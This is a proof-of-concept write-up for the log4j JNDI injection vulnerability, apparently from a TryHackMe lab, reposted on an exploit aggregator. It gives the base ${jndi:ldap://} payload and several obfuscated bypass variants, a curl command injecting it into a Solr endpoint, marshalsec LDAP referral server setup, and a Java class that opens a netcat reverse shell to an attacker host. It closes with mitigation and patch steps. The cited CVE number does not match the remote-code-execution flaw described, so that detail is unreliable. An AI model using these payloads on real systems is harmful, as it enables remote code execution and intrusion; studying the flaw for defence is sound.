Share
## https://sploitus.com/exploit?id=AFC5A984-3296-5D6A-AE73-0771AF4EDAF6
# log4j exploitation Proof Of Concept

---
Author:[hackername](https://tryhackme.com/p/hackername)
CVE: [CVE-2021-45105](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105)
---


### Theory
- The log4j packet can interpretate some actions in a variable

For eg:
```js
${jndi:ldap://ATTACKERCONTROLLEDHOST}
```

=> This payload invokes some functionalities from `JNDI` (Java Naming and Directory Interface).
=> `ldap://` means that the target will reach a remote endpoint, with the LDAP protocol.
=> `ATTACKERCONTROLLEDHOST` means that the target will create an external connection (for get a shell).

 ##### - this syntax will be written everywere the application save some data. -
- for eg: Input boxes, user and password login forms, data entry points within applications
HTTP headers such as User-Agent, X-Forwarded-For, or other customizable headers.


=> There are a lot of bypass of the malicius payload, like this:
```java
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}

${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}

${${::-j}ndi:rmi://attackerendpoint.com/}
```

### Pactice
In this example, we'll inject the previus mlicius code into the target and we'll get a response on the attacker machine.
After that, we'll get a shell.



###### Get the request
=> Setup a listener: 
```bash
nc -lvnp [LISTENING PORT]
```
=> Send a simple `GET` request:
```bash
curl 'http://[VULNERABLE HOST]:[VULNERABLE PORT]/solr/admin/cores?foo=$\{jndi:ldap://[ATTACKER IP]:[LISTENER PORT]\}'
```


###### Get a shell

We'll use a Open-Source repository for setup a `LDAP Referral Server`, that will be used for
	redirect the initial request to another position, where it's possible to store a secondary payload.	
	This payload will execute garant to us a RCE.
- Payload (reach the attacker server):
```js
${jndi:ldap://attackerserver:1389/Resource}
```

- The vuln. server will redirect this request to a secondary `http://attackerserver/resource`.
- The victim retrieves and executes the code present in `http://attackerserver/resource`.


##### - we'll need Java8 on the our machine. -
Start the LDAP server
```bash
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://[ATTACKER IP]:8000/#Exploit"
```


We'll craft the secondary payload in Java.
- Code:
```java
public class Exploit {
	static {
		try {
			java.lang.Runtime.getRuntime().exec("nc -e /bin/bash [ATTACKER IP] [LISTENING PORT]"); 
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}
```

- Shell part: `nc -e /bin/bash [ATTACKER IP] [LISTENING PORT]`.

- Compile the payload:
```bash
javac Exploit.java -source 8 -target 8
```


And, after that, in the same folder, open the python web server:
```bash
python3 -m http.server
```

- An example of the exploit execution.

![shell](https://user-images.githubusercontent.com/54266291/146836295-b3987387-be5a-49a7-acbf-ac4066bbbbe1.png)







### Mitigation

With the root privileges add this string to the `/etc/default/solr.in.sh` file:
- string: `SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"`
- restart the service:
```bash
systemctl restart solr
```

And re-try to execute the exploit, it won't do any request to the your IP. 
(setup the listener at the same port (like before), and re-execute the "curl" command).







### Patching
Patch `logging-log4j` package to version `2.16.0` or higher.

Download the release [here]([https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0](https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0)).